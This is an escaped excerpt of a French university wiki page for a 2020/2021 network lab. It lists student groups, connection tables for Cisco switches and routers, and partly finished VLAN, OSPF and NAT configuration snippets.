| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation du réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Branchement du matériel ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global_scheme_PRA_2020.png|600px|center|Schéma de câblage]]&lt;br /&gt;
&lt;br /&gt;
=== Connexions entre équipements ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/4&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te1/1/1&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/5&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| AAA&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te5/5&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.5/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Eth5&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 6509-E&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Te6/4&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.12/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 1G&lt;br /&gt;
| Te1/1/3&lt;br /&gt;
| 333&lt;br /&gt;
| 100.64.0.6/24&lt;br /&gt;
|-&lt;br /&gt;
| CAPBRETON&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Eth4&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name Internet&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.12 255.255.255.248&lt;br /&gt;
 exit&lt;br /&gt;
 int te6/4&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 [Parametrage Vlan fait]&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.0.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage NAT ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
[A COMPLETER]&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    ip nat inside source static local-ip global-ip&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat inside&lt;br /&gt;
    exit&lt;br /&gt;
    interface type number&lt;br /&gt;
    ip address ip-address mask [secondary]&lt;br /&gt;
    ip nat outside&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	</feed>